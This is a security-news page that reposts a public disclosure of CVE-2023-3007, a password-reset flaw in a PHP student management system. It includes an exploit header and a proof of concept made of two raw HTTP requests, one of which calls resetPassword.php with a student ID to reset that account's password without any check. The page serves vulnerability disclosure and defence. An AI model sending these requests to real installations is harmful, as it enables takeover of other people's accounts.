Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-3007: webray.com.cn/password_reset.md at main · Xor-Gerke/webray.com.cn

A vulnerability was found in ningzichun Student Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file resetPassword.php of the component Password Reset Handler. The manipulation of the argument sid leads to weak password recovery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-230354 is the identifier assigned to this vulnerability.

CVE
Open in Source
#sql#vulnerability#web#mac#windows#apache#git#intel#php#auth#firefox

student-management-system resetPassword.php user password reset****Exploit Title: student-management-system resetPassword.php user password reset****Exploit Author: [email protected] inc****Vendor Homepage: https://github.com/ningzichun/student-management-system****Software Link: https://github.com/ningzichun/student-management-system****Version: student-management-system 1.0****Tested on: Windows Server 2008 R2 Enterprise, Apache ,Mysql****Description

The step of modifying the password was not verified, resulting in the ability to directly enter the website where the final password was modified, directly redirect to the page, and then enter a new password to reset the password, resulting in a everybody password reset student-management-system does not filter the content correctly at the “resetPassword.php” sid module, resulting in anyone password reset.

Payload used:

test account:201600012489 /resetPassword.php?sid=xxxx

Proof of Concept

  1. Open login.php source code.

  2. request a getUser.php response.

    GET /student/admin/fun/getUser.php HTTP/1.1 Host: 172.24.6.107:8081 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Origin: http://172.24.6.107:8081 Connection: close Referer: http://172.24.6.107:8081/student/?retry=1 Cookie: PHPSESSID= Upgrade-Insecure-Requests: 1 Pragma: no-cache Cache-Control: no-cache

  1. request a resetPassword.php response.

    GET /student/admin/fun/resetPassword.php?sid=201600012489 HTTP/1.1 Host: 172.24.6.107:8081 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Origin: http://172.24.6.107:8081 Connection: close Referer: http://172.24.6.107:8081/student/?retry=1 Cookie: PHPSESSID= Upgrade-Insecure-Requests: 1 Pragma: no-cache Cache-Control: no-cache

  1. user login

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE